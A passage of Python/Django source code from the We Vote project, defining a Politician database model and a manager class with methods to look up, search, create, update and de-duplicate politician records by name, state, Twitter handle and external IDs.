'we_vote_hosted_profile_image_url_large',
'we_vote_hosted_profile_image_url_medium',
'we_vote_hosted_profile_image_url_tiny',
'wikipedia_id',
]
class Politician(models.Model):
# We are relying on built-in Python id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "pol", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_politician_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id of this politician", max_length=255, default=None, null=True,
blank=True, unique=True)
# See this url for properties: https://docs.python.org/2/library/functions.html#property
first_name = models.CharField(verbose_name="first name",
max_length=255, default=None, null=True, blank=True)
middle_name = models.CharField(verbose_name="middle name",
max_length=255, default=None, null=True, blank=True)
last_name = models.CharField(verbose_name="last name",
max_length=255, default=None, null=True, blank=True)
politician_name = models.CharField(verbose_name="official full name",
max_length=255, default=None, null=True, blank=True)
# This is the politician's name from GoogleCivicCandidateCampaign
google_civic_candidate_name = models.CharField(verbose_name="full name from google civic",
max_length=255, default=None, null=True, blank=True)
google_civic_candidate_name2 = models.CharField(max_length=255, null=True)
google_civic_candidate_name3 = models.CharField(max_length=255, null=True)
# This is the politician's name assembled from TheUnitedStatesIo first_name + last_name for quick search
full_name_assembled = models.CharField(verbose_name="full name assembled from first_name + last_name",
max_length=255, default=None, null=True, blank=True)
gender = models.CharField("gender", max_length=1, choices=GENDER_CHOICES, default=UNKNOWN)
birth_date = models.DateField("birth date", default=None, null=True, blank=True)
# race = enum?
# official_image_id = ??
bioguide_id = models.CharField(verbose_name="bioguide unique identifier",
max_length=200, null=True, unique=True)
thomas_id = models.CharField(verbose_name="thomas unique identifier",
max_length=200, null=True, unique=True)
lis_id = models.CharField(verbose_name="lis unique identifier",
max_length=200, null=True, blank=True, unique=False)
govtrack_id = models.CharField(verbose_name="govtrack unique identifier",
max_length=200, null=True, unique=True)
opensecrets_id = models.CharField(verbose_name="opensecrets unique identifier",
max_length=200, null=True, unique=False)
vote_smart_id = models.CharField(verbose_name="votesmart unique identifier",
max_length=200, null=True, unique=False)
fec_id = models.CharField(verbose_name="fec unique identifier",
max_length=200, null=True, unique=True, blank=True)
cspan_id = models.CharField(verbose_name="cspan unique identifier",
max_length=200, null=True, blank=True, unique=False)
wikipedia_id = models.CharField(verbose_name="wikipedia url",
max_length=500, default=None, null=True, blank=True)
ballotpedia_id = models.CharField(verbose_name="ballotpedia url",
max_length=500, default=None, null=True, blank=True)
house_history_id = models.CharField(verbose_name="house history unique identifier",
max_length=200, null=True, blank=True)
maplight_id = models.CharField(verbose_name="maplight unique identifier",
max_length=200, null=True, unique=True, blank=True)
washington_post_id = models.CharField(verbose_name="washington post unique identifier",
max_length=200, null=True, unique=False)
icpsr_id = models.CharField(verbose_name="icpsr unique identifier",
max_length=200, null=True, unique=False)
tag_link = models.ManyToManyField(Tag, through='PoliticianTagLink')
# The full name of the party the official belongs to.
political_party = models.CharField(verbose_name="politician political party", max_length=255, null=True)
state_code = models.CharField(verbose_name="politician home state", max_length=2, null=True)
politician_url = models.URLField(
verbose_name='latest website url of politician', max_length=255, blank=True, null=True)
politician_twitter_handle = models.CharField(
verbose_name='politician twitter screen_name', max_length=255, null=True, unique=False)
vote_usa_politician_id = models.CharField(
verbose_name="Vote USA permanent id for this candidate", max_length=64, default=None, null=True, blank=True)
we_vote_hosted_profile_image_url_large = models.URLField(verbose_name='we vote hosted large image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_medium = models.URLField(verbose_name='we vote hosted medium image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_tiny = models.URLField(verbose_name='we vote hosted tiny image url',
blank=True, null=True)
# ctcl politician fields
ctcl_uuid = models.CharField(verbose_name="ctcl uuid", max_length=36, null=True, blank=True)
politician_facebook_id = models.CharField(verbose_name='politician facebook user name', max_length=255, null=True,
unique=False)
politician_phone_number = models.CharField(verbose_name='politician phone number', max_length=255, null=True,
unique=False)
politician_googleplus_id = models.CharField(verbose_name='politician googleplus profile name', max_length=255,
null=True, unique=False)
politician_youtube_id = models.CharField(verbose_name='politician youtube profile name', max_length=255, null=True,
unique=False)
politician_email_address = models.CharField(verbose_name='politician email address', max_length=80, null=True,
unique=False)
date_last_updated = models.DateTimeField(null=True, auto_now=True)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_politician_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "pol" = tells us this is a unique id for a Politician
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}pol{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
if self.maplight_id == "": # We want this to be unique IF there is a value, and otherwise "None"
self.maplight_id = None
super(Politician, self).save(*args, **kwargs)
    def __str__(self):
        return self.last_name
class Meta:
ordering = ('last_name',)
def display_full_name(self):
if self.politician_name:
return self.politician_name
elif self.first_name and self.last_name:
return self.first_name + " " + self.last_name
elif self.google_civic_candidate_name:
return self.google_civic_candidate_name
else:
return self.first_name + " " + self.last_name
def politician_photo_url(self):
"""
fetch URL of politician's photo from TheUnitedStatesIo repo
"""
if self.bioguide_id:
url_str = 'https://theunitedstates.io/images/congress/225x275/{bioguide_id}.jpg'.format(
bioguide_id=self.bioguide_id)
return url_str
else:
return ""
def is_female(self):
return self.gender in [FEMALE]
def is_gender_neutral(self):
return self.gender in [GENDER_NEUTRAL]
def is_male(self):
return self.gender in [MALE]
def is_gender_specified(self):
return self.gender in [FEMALE, GENDER_NEUTRAL, MALE]
class PoliticiansAreNotDuplicates(models.Model):
"""
When checking for duplicates, there are times when we want to explicitly mark two politicians as NOT duplicates
"""
politician1_we_vote_id = models.CharField(
verbose_name="first politician we are tracking", max_length=255, null=True, unique=False)
politician2_we_vote_id = models.CharField(
verbose_name="second politician we are tracking", max_length=255, null=True, unique=False)
def fetch_other_politician_we_vote_id(self, one_we_vote_id):
if one_we_vote_id == self.politician1_we_vote_id:
return self.politician2_we_vote_id
elif one_we_vote_id == self.politician2_we_vote_id:
return self.politician1_we_vote_id
else:
# If the we_vote_id passed in wasn't found, don't return another we_vote_id
return ""
class PoliticianManager(models.Manager):
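    """Query and persistence helpers for Politician records (retrieve, search, create/update)."""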
def __init__(self):
pass
def politician_photo_url(self, politician_id):
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id)
if results['success']:
politician = results['politician']
return politician.politician_photo_url()
return ""
def retrieve_politician(self, politician_id=0, we_vote_id=None, read_only=False):
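        """Retrieve a single Politician by database id or we_vote_id; set read_only=True to query the readonly database."""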
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
politician = None
        politician_found = False
        # Keep the incoming politician_id -- resetting it here would break retrieval by id below
        politician_we_vote_id = ""
success = True
status = ''
try:
if positive_value_exists(politician_id):
if positive_value_exists(read_only):
politician = Politician.objects.using('readonly').get(id=politician_id)
else:
politician = Politician.objects.get(id=politician_id)
politician_id = politician.id
politician_we_vote_id = politician.we_vote_id
politician_found = True
elif positive_value_exists(we_vote_id):
if positive_value_exists(read_only):
politician = Politician.objects.using('readonly').get(we_vote_id__iexact=we_vote_id)
else:
politician = Politician.objects.get(we_vote_id__iexact=we_vote_id)
politician_id = politician.id
politician_we_vote_id = politician.we_vote_id
politician_found = True
except Politician.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
success = False
status += "MULTIPLE_POLITICIANS_FOUND "
except Politician.DoesNotExist:
error_result = True
exception_does_not_exist = True
status += "NO_POLITICIAN_FOUND "
except Exception as e:
success = False
status += "PROBLEM_WITH_RETRIEVE_POLITICIAN: " + str(e) + ' '
results = {
'success': success,
'status': status,
'politician': politician,
'politician_found': politician_found,
'politician_id': politician_id,
'politician_we_vote_id': politician_we_vote_id,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
}
return results
def retrieve_politician_from_we_vote_id(self, politician_we_vote_id):
return self.retrieve_politician(0, politician_we_vote_id)
def retrieve_all_politicians_that_might_match_candidate(
self,
candidate_name='',
candidate_twitter_handle='',
google_civic_candidate_name='',
google_civic_candidate_name2='',
google_civic_candidate_name3='',
maplight_id='',
state_code='',
vote_smart_id='',
vote_usa_politician_id='',
):
politician_list = []
politician_list_found = False
politician = Politician()
politician_found = False
status = ''
try:
filter_set = False
politician_queryset = Politician.objects.all()
filters = []
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id__iexact=vote_smart_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(vote_usa_politician_id):
new_filter = Q(vote_usa_politician_id__iexact=vote_usa_politician_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id__iexact=maplight_id)
filter_set = True
filters.append(new_filter)
if positive_value_exists(candidate_twitter_handle):
new_filter = Q(politician_twitter_handle__iexact=candidate_twitter_handle)
filter_set = True
filters.append(new_filter)
if positive_value_exists(candidate_name) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=candidate_name,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name2) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name2,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
if positive_value_exists(google_civic_candidate_name3) and positive_value_exists(state_code):
new_filter = Q(politician_name__iexact=google_civic_candidate_name3,
state_code__iexact=state_code)
filter_set = True
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
politician_queryset = politician_queryset.filter(final_filters)
if filter_set:
politician_list = politician_queryset
else:
politician_list = []
if len(politician_list) == 1:
politician_found = True
politician_list_found = False
politician = politician_list[0]
status += 'ONE_POLITICIAN_RETRIEVED '
elif len(politician_list):
politician_found = False
politician_list_found = True
status += 'POLITICIAN_LIST_RETRIEVED '
else:
status += 'NO_POLITICIANS_RETRIEVED '
success = True
except Exception as e:
            status = 'FAILED retrieve_all_politicians_that_might_match_candidate ' \
                     '{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
# TODO DALE If nothing found, look for a national entry for this candidate -- i.e. Presidential candidates
if not politician_found and not politician_list_found:
pass
results = {
'success': success,
'status': status,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
'politician_found': politician_found,
'politician': politician,
}
return results
def reset_politician_image_details_from_candidate(self, candidate, twitter_profile_image_url_https,
twitter_profile_background_image_url_https,
twitter_profile_banner_url_https):
"""
Reset an Politician entry with original image details from we vote image.
:param candidate:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:return:
"""
politician_details = self.retrieve_politician(0, candidate.politician_we_vote_id)
politician = politician_details['politician']
if politician_details['success']:
politician.we_vote_hosted_profile_image_url_medium = ''
politician.we_vote_hosted_profile_image_url_large = ''
politician.we_vote_hosted_profile_image_url_tiny = ''
politician.save()
success = True
status = "RESET_POLITICIAN_IMAGE_DETAILS"
else:
success = False
status = "POLITICIAN_NOT_FOUND_IN_RESET_IMAGE_DETAILS"
results = {
'success': success,
'status': status,
'politician': politician
}
return results
def search_politicians(self, name_search_terms=None):
status = ""
success = True
politician_search_results_list = []
try:
queryset = Politician.objects.all()
if name_search_terms is not None:
name_search_words = name_search_terms.split()
else:
name_search_words = []
for one_word in name_search_words:
filters = [] # Reset for each search word
new_filter = Q(politician_name__icontains=one_word)
filters.append(new_filter)
new_filter = Q(politician_twitter_handle__icontains=one_word)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
queryset = queryset.filter(final_filters)
politician_search_results_list = list(queryset)
except Exception as e:
success = False
status += "ERROR_SEARCHING_POLITICIANS: " + str(e) + " "
results = {
'status': status,
'success': success,
'politician_search_results_list': politician_search_results_list,
}
return results
def update_politician_details_from_candidate(self, candidate):
"""
Update a politician entry with details retrieved from candidate
:param candidate:
:return:
"""
values_changed = False
politician_details = self.retrieve_politician(0, candidate.politician_we_vote_id)
politician = politician_details['politician']
if politician_details['success'] and politician:
# Politician found so update politician details with candidate details
first_name = extract_first_name_from_full_name(candidate.candidate_name)
middle_name = extract_middle_name_from_full_name(candidate.candidate_name)
last_name = extract_last_name_from_full_name(candidate.candidate_name)
if positive_value_exists(first_name) and first_name != politician.first_name:
politician.first_name = first_name
values_changed = True
if positive_value_exists(last_name) and last_name != politician.last_name:
politician.last_name = last_name
values_changed = True
if positive_value_exists(middle_name) and middle_name != politician.middle_name:
politician.middle_name = middle_name
values_changed = True
if positive_value_exists(candidate.party):
if convert_to_political_party_constant(candidate.party) != politician.political_party:
politician.political_party = convert_to_political_party_constant(candidate.party)
values_changed = True
if positive_value_exists(candidate.vote_smart_id) and candidate.vote_smart_id != politician.vote_smart_id:
politician.vote_smart_id = candidate.vote_smart_id
values_changed = True
if positive_value_exists(candidate.maplight_id) and candidate.maplight_id != politician.maplight_id:
politician.maplight_id = candidate.maplight_id
values_changed = True
if positive_value_exists(candidate.candidate_name) and \
candidate.candidate_name != politician.politician_name:
politician.politician_name = candidate.candidate_name
values_changed = True
if positive_value_exists(candidate.google_civic_candidate_name) and \
candidate.google_civic_candidate_name != politician.google_civic_candidate_name:
politician.google_civic_candidate_name = candidate.google_civic_candidate_name
values_changed = True
if positive_value_exists(candidate.state_code) and candidate.state_code != politician.state_code:
politician.state_code = candidate.state_code
values_changed = True
if positive_value_exists(candidate.candidate_twitter_handle) and \
candidate.candidate_twitter_handle != politician.politician_twitter_handle:
politician.politician_twitter_handle = candidate.candidate_twitter_handle
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_large) and \
candidate.we_vote_hosted_profile_image_url_large != \
politician.we_vote_hosted_profile_image_url_large:
politician.we_vote_hosted_profile_image_url_large = candidate.we_vote_hosted_profile_image_url_large
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_medium) and \
candidate.we_vote_hosted_profile_image_url_medium != \
politician.we_vote_hosted_profile_image_url_medium:
politician.we_vote_hosted_profile_image_url_medium = candidate.we_vote_hosted_profile_image_url_medium
values_changed = True
if positive_value_exists(candidate.we_vote_hosted_profile_image_url_tiny) and \
candidate.we_vote_hosted_profile_image_url_tiny != politician.we_vote_hosted_profile_image_url_tiny:
politician.we_vote_hosted_profile_image_url_tiny = candidate.we_vote_hosted_profile_image_url_tiny
values_changed = True
if values_changed:
politician.save()
success = True
status = "SAVED_POLITICIAN_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_POLITICIAN_DETAILS"
else:
success = False
status = "POLITICIAN_NOT_FOUND"
results = {
'success': success,
'status': status,
'politician': politician
}
return results
def update_or_create_politician_from_candidate(self, candidate):
"""
Take a We Vote candidate object, and map it to update_or_create_politician
:param candidate:
:return:
"""
first_name = extract_first_name_from_full_name(candidate.candidate_name)
middle_name = extract_middle_name_from_full_name(candidate.candidate_name)
last_name = extract_last_name_from_full_name(candidate.candidate_name)
political_party = convert_to_political_party_constant(candidate.party)
# TODO Add all other identifiers from other systems
updated_politician_values = {
'vote_smart_id': candidate.vote_smart_id,
'vote_usa_politician_id': candidate.vote_usa_politician_id,
'maplight_id': candidate.maplight_id,
'politician_name': candidate.candidate_name,
'google_civic_candidate_name': candidate.google_civic_candidate_name,
'state_code': candidate.state_code,
'politician_twitter_handle': candidate.candidate_twitter_handle,
'we_vote_hosted_profile_image_url_large': candidate.we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': candidate.we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': candidate.we_vote_hosted_profile_image_url_tiny,
'first_name': first_name,
'middle_name': middle_name,
'last_name': last_name,
'political_party': political_party,
}
return self.update_or_create_politician(
updated_politician_values=updated_politician_values,
politician_we_vote_id=candidate.politician_we_vote_id,
vote_usa_politician_id=candidate.vote_usa_politician_id,
candidate_twitter_handle=candidate.candidate_twitter_handle,
candidate_name=candidate.candidate_name,
state_code=candidate.state_code)
def update_or_create_politician(
self,
updated_politician_values={},
politician_we_vote_id='',
vote_smart_id=0,
vote_usa_politician_id='',
maplight_id="",
candidate_twitter_handle="",
candidate_name="",
state_code="",
first_name="",
middle_name="",
last_name=""):
"""
Either update or create a politician entry. The individual variables passed in are for the purpose of finding
a politician to update, and the updated_politician_values variable contains the values we want to update to.
"""
new_politician_created = False
politician_found = False
politician = Politician()
status = ''
try:
# Note: When we decide to start updating candidate_name elsewhere within We Vote, we should stop
# updating candidate_name via subsequent Google Civic imports
# If coming from a record that has already been in We Vote
if positive_value_exists(politician_we_vote_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
we_vote_id__iexact=politician_we_vote_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(vote_smart_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
vote_smart_id=vote_smart_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(vote_usa_politician_id):
politician, new_politician_created = \
Politician.objects.update_or_create(
vote_usa_politician_id=vote_usa_politician_id,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(candidate_twitter_handle):
politician, new_politician_created = \
Politician.objects.update_or_create(
politician_twitter_handle__iexact=candidate_twitter_handle,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(candidate_name) and positive_value_exists(state_code):
state_code = state_code.lower()
politician, new_politician_created = \
Politician.objects.update_or_create(
politician_name=candidate_name,
state_code=state_code,
defaults=updated_politician_values)
politician_found = True
elif positive_value_exists(first_name) and positive_value_exists(last_name) \
and positive_value_exists(state_code):
state_code = state_code.lower()
politician, new_politician_created = \
Politician.objects.update_or_create(
first_name=first_name,
last_name=last_name,
state_code=state_code,
defaults=updated_politician_values)
politician_found = True
else:
# If here we have exhausted our set of unique identifiers
politician_found = False
pass
success = True
if politician_found:
status += 'POLITICIAN_SAVED '
else:
status += 'POLITICIAN_NOT_SAVED '
except Exception as e:
success = False
status = 'UNABLE_TO_UPDATE_OR_CREATE_POLITICIAN: ' + str(e) + ' '
results = {
'success': success,
'status': status,
'politician_created': new_politician_created,
'politician_found': politician_found,
'politician': politician,
}
return results
def fetch_politician_id_from_we_vote_id(self, we_vote_id):
politician_id = 0
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id, we_vote_id)
if results['success']:
return results['politician_id']
return 0
def fetch_politician_we_vote_id_from_id(self, politician_id):
we_vote_id = ''
politician_manager = PoliticianManager()
results = politician_manager.retrieve_politician(politician_id, we_vote_id)
if results['success']:
return results['politician_we_vote_id']
return ''
def fetch_politicians_are_not_duplicates_list_we_vote_ids(self, politician_we_vote_id):
results = self.retrieve_politicians_are_not_duplicates_list(politician_we_vote_id)
return results['politicians_are_not_duplicates_list_we_vote_ids']
def create_politician_row_entry(self, politician_name, politician_first_name, politician_middle_name,
politician_last_name, ctcl_uuid, political_party, politician_email_address,
politician_phone_number, politician_twitter_handle, politician_facebook_id,
politician_googleplus_id, politician_youtube_id, politician_website_url):
"""
Create Politician table entry with Politician details
:param politician_name:
:param politician_first_name:
:param politician_middle_name:
:param politician_last_name:
:param ctcl_uuid:
:param political_party:
:param politician_email_address:
:param politician_phone_number:
:param politician_twitter_handle:
:param politician_facebook_id:
:param politician_googleplus_id:
:param politician_youtube_id:
:param politician_website_url:
:return:
"""
success = False
status = ""
politician_updated = False
new_politician_created = False
new_politician = ''
try:
new_politician = Politician.objects.create(politician_name=politician_name,
first_name=politician_first_name,
middle_name=politician_middle_name,
last_name=politician_last_name, political_party=political_party,
politician_email_address=politician_email_address,
politician_phone_number=politician_phone_number,
politician_twitter_handle=politician_twitter_handle,
politician_facebook_id=politician_facebook_id,
politician_googleplus_id=politician_googleplus_id,
politician_youtube_id=politician_youtube_id,
politician_url=politician_website_url, ctcl_uuid=ctcl_uuid)
if new_politician:
success = True
status += "POLITICIAN_CREATED "
new_politician_created = True
else:
success = False
status += "POLITICIAN_CREATE_FAILED "
except Exception as e:
success = False
new_politician_created = False
status += "POLITICIAN_RETRIEVE_ERROR "
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'new_politician_created': new_politician_created,
'politician_updated': politician_updated,
'new_politician': new_politician,
}
return results
def update_politician_row_entry(self, politician_name, politician_first_name, politician_middle_name,
politician_last_name, ctcl_uuid, political_party, politician_email_address,
politician_twitter_handle, politician_phone_number, politician_facebook_id,
politician_googleplus_id, politician_youtube_id, politician_website_url,
politician_we_vote_id):
"""
Update Politician table entry with matching we_vote_id
:param politician_name:
:param politician_first_name:
:param politician_middle_name:
:param politician_last_name:
:param ctcl_uuid:
:param political_party:
:param politician_email_address:
:param politician_twitter_handle:
:param politician_phone_number:
:param politician_facebook_id:
:param politician_googleplus_id:
:param politician_youtube_id:
:param politician_website_url:
:param politician_we_vote_id:
:return:
"""
success = False
status = ""
politician_updated = False
# new_politician_created = False
# new_politician = ''
existing_politician_entry = ''
try:
existing_politician_entry = Politician.objects.get(we_vote_id__iexact=politician_we_vote_id)
if existing_politician_entry:
# found the existing entry, update the values
existing_politician_entry.politician_name = politician_name
existing_politician_entry.first_name = politician_first_name
existing_politician_entry.middle_name = politician_middle_name
existing_politician_entry.last_name = politician_last_name
existing_politician_entry.party_name = political_party
existing_politician_entry.ctcl_uuid = ctcl_uuid
existing_politician_entry.politician_phone_number = politician_phone_number
existing_politician_entry.twitter_handle = politician_twitter_handle
existing_politician_entry.politician_facebook_id = politician_facebook_id
existing_politician_entry.politician_googleplus_id = politician_googleplus_id
existing_politician_entry.politician_youtube_id = politician_youtube_id
existing_politician_entry.politician_url = politician_website_url
existing_politician_entry.politician_email_address = politician_email_address
# now go ahead and save this entry (update)
existing_politician_entry.save()
politician_updated = True
success = True
status = "POLITICIAN_UPDATED"
except Exception as e:
success = False
politician_updated = False
status = "POLITICIAN_RETRIEVE_ERROR"
handle_exception(e, logger=logger, exception_message=status)
results = {
'success': success,
'status': status,
'politician_updated': politician_updated,
'updated_politician': existing_politician_entry,
}
return results
# def delete_all_politician_data():
# with open(LEGISLATORS_CURRENT_FILE, 'rU') as politicians_current_data:
# politicians_current_data.readline() # Skip the header
# reader = csv.reader(politicians_current_data) # Create a regular tuple reader
# for index, politician_row in enumerate(reader):
# if index > 3:
# break
# politician_entry = Politician.objects.order_by('last_name')[0]
# politician_entry.delete()
def retrieve_politicians(
self,
limit_to_this_state_code="",
read_only=False,
):
"""
:param limit_to_this_state_code:
:param read_only:
:return:
"""
status = ""
politician_list = []
politician_list_found = False
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
if positive_value_exists(limit_to_this_state_code):
politician_query = politician_query.filter(state_code__iexact=limit_to_this_state_code)
politician_list = list(politician_query)
if len(politician_list):
politician_list_found = True
status += 'POLITICIANS_RETRIEVED '
success = True
else:
status += 'NO_POLITICIANS_RETRIEVED '
success = True
except Politician.DoesNotExist:
# No politicians found. Not a problem.
status += 'NO_POLITICIANS_FOUND_DoesNotExist '
            politician_list = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
            status += 'FAILED-retrieve_politicians: ' + str(e) + ' '
success = False
results = {
'success': success,
'status': status,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
}
return results
def retrieve_politicians_from_non_unique_identifiers(
self,
state_code='',
politician_twitter_handle='',
politician_name='',
ignore_politician_id_list=[],
read_only=False):
"""
:param state_code:
:param politician_twitter_handle:
:param politician_name:
:param ignore_politician_id_list:
:param read_only:
:return:
"""
keep_looking_for_duplicates = True
politician = None
politician_found = False
politician_list = []
politician_list_found = False
politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)
multiple_entries_found = False
success = True
status = ""
if keep_looking_for_duplicates and positive_value_exists(politician_twitter_handle):
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(politician_twitter_handle__iexact=politician_twitter_handle)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# At least one entry exists
status += 'RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_LIST_RETRIEVED '
# if a single entry matches, update that entry
if len(politician_list) == 1:
multiple_entries_found = False
politician = politician_list[0]
politician_found = True
keep_looking_for_duplicates = False
success = True
status += "POLITICIAN_FOUND_BY_TWITTER "
else:
# more than one entry found
politician_list_found = True
multiple_entries_found = True
keep_looking_for_duplicates = False # Deal with multiple Twitter duplicates manually
status += "MULTIPLE_TWITTER_MATCHES "
except Politician.DoesNotExist:
success = True
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND "
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED1 " + str(e) + " "
success = False
keep_looking_for_duplicates = False
# twitter handle does not exist, next look up against other data that might match
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search by Candidate name exact match
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
Q(politician_name__iexact=politician_name) |
Q(google_civic_candidate_name__iexact=politician_name) |
Q(google_civic_candidate_name2__iexact=politician_name) |
Q(google_civic_candidate_name3__iexact=politician_name)
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# entry exists
status += 'POLITICIAN_ENTRY_EXISTS1 '
success = True
# if a single entry matches, update that entry
if len(politician_list) == 1:
politician = politician_list[0]
politician_found = True
status += politician.we_vote_id + " "
keep_looking_for_duplicates = False
else:
# more than one entry found with a match in Politician
politician_list_found = True
keep_looking_for_duplicates = False
multiple_entries_found = True
else:
success = True
status += 'POLITICIAN_ENTRY_NOT_FOUND-EXACT '
except Politician.DoesNotExist:
success = True
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND-EXACT_MATCH "
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED2: " + str(e) + " "
success = False
if keep_looking_for_duplicates and positive_value_exists(politician_name):
# Search for Candidate(s) that contains the same first and last names
first_name = extract_first_name_from_full_name(politician_name)
last_name = extract_last_name_from_full_name(politician_name)
if positive_value_exists(first_name) and positive_value_exists(last_name):
try:
if positive_value_exists(read_only):
politician_query = Politician.objects.using('readonly').all()
else:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(
(Q(politician_name__icontains=first_name) & Q(politician_name__icontains=last_name)) |
(Q(google_civic_candidate_name__icontains=first_name) &
Q(google_civic_candidate_name__icontains=last_name)) |
(Q(google_civic_candidate_name2__icontains=first_name) &
Q(google_civic_candidate_name2__icontains=last_name)) |
(Q(google_civic_candidate_name3__icontains=first_name) &
Q(google_civic_candidate_name3__icontains=last_name))
)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_list = list(politician_query)
if len(politician_list):
# entry exists
status += 'POLITICIAN_ENTRY_EXISTS2 '
success = True
# if a single entry matches, update that entry
if len(politician_list) == 1:
politician = politician_list[0]
politician_found = True
status += politician.we_vote_id + " "
keep_looking_for_duplicates = False
else:
# more than one entry found with a match in Politician
politician_list_found = True
keep_looking_for_duplicates = False
multiple_entries_found = True
else:
status += 'POLITICIAN_ENTRY_NOT_FOUND-FIRST_OR_LAST '
success = True
except Politician.DoesNotExist:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_NOT_FOUND-FIRST_OR_LAST_NAME "
success = True
except Exception as e:
status += "RETRIEVE_POLITICIANS_FROM_NON_UNIQUE-POLITICIAN_QUERY_FAILED3: " + str(e) + " "
success = False
results = {
'success': success,
'status': status,
'politician_found': politician_found,
'politician': politician,
'politician_list_found': politician_list_found,
'politician_list': politician_list,
'multiple_entries_found': multiple_entries_found,
}
return results
def fetch_politicians_from_non_unique_identifiers_count(
self,
state_code='',
politician_twitter_handle='',
politician_name='',
ignore_politician_id_list=[]):
keep_looking_for_duplicates = True
politician_twitter_handle = extract_twitter_handle_from_text_string(politician_twitter_handle)
status = ""
if keep_looking_for_duplicates and positive_value_exists(politician_twitter_handle):
try:
politician_query = Politician.objects.all()
politician_query = politician_query.filter(politician_twitter_handle__iexact=politician_twitter_handle)
if positive_value_exists(state_code):
politician_query = politician_query.filter(state_code__iexact=state_code)
if positive_value_exists(ignore_politician_id_list):
politician_query = politician_query.exclude(we_vote_id__in=ignore_politician_id_list)
politician_count = politician_query.count()
if positive_value_exists(politician_count):
return politician_count
except Politician.DoesNotExist:
